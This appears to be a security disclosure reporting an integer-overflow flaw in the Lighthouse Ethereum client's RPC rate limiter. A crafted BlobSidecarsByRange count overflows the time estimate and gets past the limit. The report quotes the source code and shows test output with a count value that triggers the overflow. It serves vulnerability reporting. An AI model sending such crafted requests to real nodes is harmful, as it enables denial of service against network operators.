Increasing greater than or equal to 25% of network processing node resource consumption by at least 30% without brute force actions, compared to the preceding 24 hours
Description
Brief/Intro
The issue is very similar to #38920 which I've sent earlier.
Lighthouse internal rate limiter is vulnerable to integer overflow.
Remote attacker will be able to bypass rate limit checks and trigger potential Denial of Service issue.
Vulnerability Details
The BlobSidecarsByRange p2p request https://github.com/ethereum/consensus-specs/blob/dev/specs/deneb/p2p-interface.md?ref=bankless.ghost.io#blobsidecarsbyrange-v1 has two parameters - start_slot and count.
To prevent potential Denial of service issues, lighhouse has internal rate limiter.
If the 'count' value is too high, this rate limiter returns an error and request will not be processed.
Let's look at the code https://github.com/sigp/lighthouse/blob/stable/beacon_node/lighthouse_network/src/rpc/mod.rs#L396
fn on_connection_handler_event(
&mut self,
peer_id: PeerId,
conn_id: ConnectionId,
event: <Self::ConnectionHandler as ConnectionHandler>::ToBehaviour,
) {
match event {
HandlerEvent::Ok(RPCReceived::Request(Request {
id,
substream_id,
r#type,
})) => {
if let Some(limiter) = self.limiter.as_mut() {
// check if the request is conformant to the quota
1) match limiter.allows(&peer_id, &r#type) {
Err(RateLimitedErr::TooLarge) => {
// we set the batch sizes, so this is a coding/config err for most protocols
let protocol = r#type.versioned_protocol().protocol();
if matches!(
protocol,
Protocol::BlocksByRange
| Protocol::BlobsByRange
| Protocol::DataColumnsByRange
| Protocol::BlocksByRoot
| Protocol::BlobsByRoot
| Protocol::DataColumnsByRoot
) {
debug!(self.log, "Request too large to process"; "request" => %r#type, "protocol" => %protocol);
} else {
// Other protocols shouldn't be sending large messages, we should flag the peer kind
crit!(self.log, "Request size too large to ever be processed"; "protocol" => %protocol);
}
// send an error code to the peer.
// the handler upon receiving the error code will send it back to the behaviour
...
return;
}
Err(RateLimitedErr::TooSoon(wait_time)) => {
debug!(self.log, "Request exceeds the rate limit";
"request" => %r#type, "peer_id" => %peer_id, "wait_time_ms" => wait_time.as_millis());
// send an error code to the peer.
// the handler upon receiving the error code will send it back to the behaviour
...
return;
}
// No rate limiting, continue.
Ok(()) => {}
}
}
...
}
Line #1 - rate limiter is called on this line, let's look at the actual implementation https://github.com/sigp/lighthouse/blob/stable/beacon_node/lighthouse_network/src/rpc/rate_limiter.rs
pub fn allows<Item: RateLimiterItem>(
&mut self,
peer_id: &PeerId,
request: &Item,
) -> Result<(), RateLimitedErr> {
let time_since_start = self.init_time.elapsed();
1) let tokens = request.max_responses().max(1);
let check =
|limiter: &mut Limiter<PeerId>| limiter.allows(time_since_start, peer_id, tokens);
...
}
pub fn allows(
&mut self,
time_since_start: Duration,
key: &Key,
tokens: u64,
) -> Result<(), RateLimitedErr> {
let time_since_start = time_since_start.as_nanos() as u64;
let tau = self.tau;
let t = self.t;
// how long does it take to replenish these tokens
2) let additional_time = t * tokens;
3) if additional_time > tau {
// the time required to process this amount of tokens is longer than the time that
// makes the bucket full. So, this batch can _never_ be processed
return Err(RateLimitedErr::TooLarge);
}
// If the key is new, we consider their bucket full (which means, their request will be
// allowed)
let tat = self
.tat_per_key
.entry(key.clone())
.or_insert(time_since_start);
// check how soon could the request be made
let earliest_time = (*tat + additional_time).saturating_sub(tau);
// earliest_time is in the future
if time_since_start < earliest_time {
Err(RateLimitedErr::TooSoon(Duration::from_nanos(
/* time they need to wait, i.e. how soon were they */
earliest_time - time_since_start,
)))
} else {
// calculate the new TAT
*tat = time_since_start.max(*tat) + additional_time;
Ok(())
}
}
pub fn max_responses(&self) -> u64 {
match self {
RequestType::BlobsByRange(req) => req.max_blobs_requested::<E>(),
}
}
impl BlobsByRangeRequest {
pub fn max_blobs_requested<E: EthSpec>(&self) -> u64 {
self.count.saturating_mul(E::max_blobs_per_block() as u64)
}
}
The value of 'tokens' variable is equal to req.max_blob_requested() ,
which is equal to 'count' multiplied by 6 (max blobs per block according to spec)
If 'tokens' is large enough, integer overflow will occur on this line
Basically, 'additional_time' is time estimate required to process the request - if it is small, this check will not pass
As a result, rate limiter returns ok and request will be processed by lighhouse.
Impact Details
Potential Denial of service issue, as attacker could request large number of blobs from a lighthouse node.
Estimate for a space occupied by blobs is around 50gb - https://lighthouse-book.sigmaprime.io/advanced-blobs.html
$ cd lighthouse/beacon_node/lighthouse_network/src/rpc
$ cargo test -r test_next_peer_request_ready -- --nocapture
you should see output like this:
running 1 test
XXXXKE testing rate limit with count 0x4142...
XXXXKE allows tokens 1603800 maxresp 1603800 proto blob_sidecars_by_range
XXXXKE allows2 t 19531250, tokens 1603800 add_time 31324218750000 vs tau 10000000000
XXXXKE rate limit error - too large!
XXXXKE testing rate limit with count 0x24a67fcd20...
XXXXKE allows tokens 944473296576 maxresp 944473296576 proto blob_sidecars_by_range
XXXXKE allows2 t 19531250, tokens 944473296576 add_time 40448384 vs tau 10000000000
XXXKE rate limit is OK
test rpc::self_limiter::tests::test_next_peer_request_ready ... ok
First run we are testing rate limit with a huge count value, rate limit signals error (too large).
Second time we are running with a count which causes integer overflow and rate limits checks are passed.